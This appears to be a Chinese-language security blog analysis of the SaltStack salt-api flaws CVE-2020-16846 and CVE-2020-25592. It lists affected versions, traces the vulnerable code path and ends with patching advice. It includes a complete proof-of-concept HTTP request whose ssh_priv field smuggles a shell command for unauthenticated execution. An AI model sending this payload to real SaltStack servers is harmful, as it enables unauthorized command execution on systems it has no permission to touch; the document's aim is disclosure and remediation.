SaltStack未授權訪問及命令執行漏洞分析(CVE-2020-16846/25592)
一、背景
漏洞概述:
2020年11月4日,SaltStack 官方釋出了一則安全更新公告,其中CVE-2020-16846和CVE-2020-25592組合使用可在未授權的情況下透過salt-api介面執行任意命令。CVE-2020-25592允許任意使用者呼叫SSH模組,CVE-2020-16846允許使用者執行任意命令。salt-api雖不是預設開啟配置,但絕大多數SaltStack使用者會選擇開啟salt-api,故存在較高風險。
漏洞編號:
CVE-2020-16846、CVE-2020-25592
受影響版本:
• 3002
• 3001.1, 3001.2
• 3000.3, 3000.4
• 2019.2.5, 2019.2.6
• 2018.3.5
• 2017.7.4, 2017.7.8
• 2016.11.3, 2016.11.6,2016.11.10
• 2016.3.4, 2016.3.6,2016.3.8
• 2015.8.10, 2015.8.13
二、漏洞分析及POC
漏洞分析
截至2020年11月11日,補丁程式碼尚未與Github中master分支程式碼合併,故可直接從SaltStack官方Github倉庫獲取,目前master的程式碼版本為3002,系統為Mac,版本號相差較大時程式碼變動較大,需另作分析。Salt Version: Salt: 3002-56-g3e269eda82 Dependency Versions: cffi: 1.14.3 cherrypy: unknown dateutil: Not Installed docker-py: Not Installed gitdb: 4.0.5 gitpython: 3.1.11 Jinja2: 2.11.2 libgit2: Not Installed M2Crypto: Not Installed Mako: 1.0.7 msgpack: 1.0.0 msgpack-pure: Not Installed mysql-python: Not Installed pycparser: 2.19 pycrypto: Not Installed pycryptodome: 3.9.9 pygit2: Not Installed Python: 3.8.2 (default, Sep 24 2020, 19:37:08) python-gnupg: Not Installed PyYAML: 5.3.1 PyZMQ: 19.0.2 smmap: 3.0.4 timelib: Not Installed Tornado: 4.5.3 ZMQ: 4.3.2 System Versions: dist: darwin 19.6.0 locale: utf-8 machine: x86_64 release: 19.6.0 system: Darwin version: 10.15.6 x86_64
salt-api REST介面預設使用cherrypy框架,從run介面的實現上可以看出透過client引數動態呼叫NetapiClient類中的方法。
文中指定程式碼位置採用以下約定:FileLocation:Classname.method()
salt/netapi/init.py:NetapiClient.run()
low引數為外部傳入引數,salt.utils.args.format_call方法將引數賦值給**kwargs。
當client引數為ssh時,動態呼叫salt/netapi/init.py:NetapiClient.ssh(),該方法未採用任何鑑權。
salt/netapi/init.py:NetapiClient.ssh()
跟進,路徑如下:
salt/netapi/init.py:NetapiClient.ssh()⇒salt/client/ssh/client.py:SSHClient.cmd_sync()⇒salt/client/ssh/client.py:SSHClient._prep_ssh()
salt/client/ssh/client.py:SSHClient._prep_ssh()
該方法將kwargs外部可控引數更新值opts變數,該變數可以理解為SaltStack系統的環境變數,使用該變數初始化salt.client.ssh.SSH。
salt/client/ssh/init.py:SSH.__init__()
priv的值從opts變數中獲取,並呼叫salt.client.ssh.shell.gen_key()方法。
salt/client/ssh/shell.py:gen_key()
該方法中對命令進行拼接,並進行執行。當傳入值為|COMMAND>{} #即可執行COMMAND命令。
POC
由上分析可知,POC如下:
POST /run HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/x-yaml Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 109 token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|open%20/System/Applications/Calculator.app%3b
關於復現環境
1. Mac上覆現需要手動建立日誌資料夾、配置資料夾等,並需要手動寫入相關配置。
2. Docker從官方環境拉取的映象中預設沒有SSH,故執行該poc時salt-api會掛掉,經測試3002版本自動重啟,3000.4版本、2019.2.5版本則不會。故當salt-api掛掉時,優先考慮當前機器上是否有SSH軟體。
三、安全建議
1. 儘快修復。由於官方並未放出升級包,故目前仍需要手動進行修復,這裡是官方安全通告和修復補丁。
2. 如非必須使用salt-api,請關閉該功能。
相關文章
- 利用CouchDB未授權訪問漏洞執行任意系統命令
- mongodb未授權訪問漏洞MongoDB
- Redis 未授權訪問漏洞利用Redis
- 【漏洞復現】Redis未授權訪問漏洞Redis
- 利用redis未授權訪問漏洞(windows版)RedisWindows
- 銘說 | Redis未授權訪問漏洞GetshellRedis
- Redis未授權訪問漏洞利用總結Redis
- 系統滲透漏洞の未授權訪問
- JBOSS未授權訪問
- Redis v6.0.5未授權訪問漏洞復現Redis
- Redis 未授權訪問漏洞(附Python指令碼)RedisPython指令碼
- Mongodb未授權訪問漏洞全網探測報告MongoDB
- Java安全漏洞:Druid未授權訪問解決JavaUI
- Linux sudo 漏洞可能導致未經授權的特權訪問Linux
- pgAdmin未授權命令執行漏洞(CVE-2022-4223)
- spark未授權RCE漏洞Spark
- 從零開始學習各種常見未授權訪問漏洞
- 多款Intel產品未授權訪問漏洞(CVE-2017-5689)Intel
- Druid未授權訪問實戰利用UI
- Redis未授權漏洞復現Redis
- Saltstack系列2:Saltstack遠端執行命令
- Etcd REST API 未授權訪問漏洞暴露 750MB 密碼和金鑰RESTAPI密碼
- Hadoop Yarn REST API未授權漏洞利用挖礦分析HadoopYarnRESTAPI
- 記一次特別的未授權訪問
- 【雲原生攻防研究】Istio訪問授權再曝高危漏洞
- saltstack非同步執行命令: job ID非同步
- Redis 未授權訪問缺陷可輕易導致系統被黑Redis
- 命令執行漏洞
- 微軟更改win10授權協議 禁止盜版遊戲和未授權硬體執行微軟Win10協議遊戲
- Mysql滲透及提權,命令執行MySql
- MySQL建立使用者授權訪問MySql
- 配置apache授權訪問目錄(轉)Apache
- CVE-2021-45232 Apache APISIX 從未授權訪問到RCEApacheAPI
- saltstack 常用執行模組
- mysql8.0授權root遠端訪問MySql
- JAVA(二)異常/包及訪問許可權/多執行緒/泛型Java訪問許可權執行緒泛型
- Firefox 31~34遠端命令執行漏洞的分析Firefox
- 基於Docker的MongoDB實現授權訪問DockerMongoDB